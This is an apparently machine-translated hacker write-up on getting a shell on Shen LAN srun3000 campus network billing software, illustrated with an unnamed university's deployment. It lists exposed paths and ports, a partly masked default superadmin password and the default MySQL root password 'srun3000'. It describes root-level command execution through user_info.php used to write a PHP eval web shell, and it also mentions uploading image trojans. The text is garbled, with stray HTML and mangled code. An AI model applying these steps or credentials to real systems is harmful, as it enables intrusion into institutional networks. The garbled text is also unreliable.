The vulnerability of Shen LAN software can be exploited by getshell.

Getshell has several vulnerabilities.

This example uses xx University of Science and Technology as an example.

1. explosive path problem http://xxxx.xx: 8080/global. php, all paths are exposed

VcjtvP68psDfwqm2tL/JsbtnZXRzaGVsbA = "data-=" "src =" http://www.bkjia.com/uploads/allimg/140609/00032a227-0.gif "style =" opacity: 1; "width =" 600 "/>

However, the actual path is/srun3/srun/services/

(1) port 80/srun3/web/

(2) Port 8800/srun3/srun/services/

(3) Port 8080/8081/srun3/srun/web/

2. Management Background (Port 8080/8081), default password

Support B ****** s (I won't reveal it). This is the password supported by srun remotely. Superadmin permission

3. Run the. 80 port/user_info.php command.

Getshell:

The system runs with the root permission, so Mom no longer worries that I have no write permission.

Because the system filters $ _ POST and so on, I had to use the stupid method.

Run the echo command to write data <? Php file_put_contents (base64_decode (/srun3/web/xx. php), base64_decode (<? Php @ eval ($ _ POST ['xxx']);?> The path is base64code in one sentence, corresponding to port 80. Generate xx. php after access

What's amazing is the php tag> This is eaten. Okay, add echo.

Of course, getshell also has other methods. log on to the management background, upload the image horse or directly upload the txt file, and copy it to php.

As the srun background does not have any plug-ins that can be directly patched like cms, many high-school companies have not been able to install patches.

The above vulnerability can be used to kill all srun3000 attacks.

General-purpose passwords, of course, can be killed. The default value of mysqlroot is srun3000. why didn't Shen LAN consider security considerations for customers during installation and debugging? The default password kills people.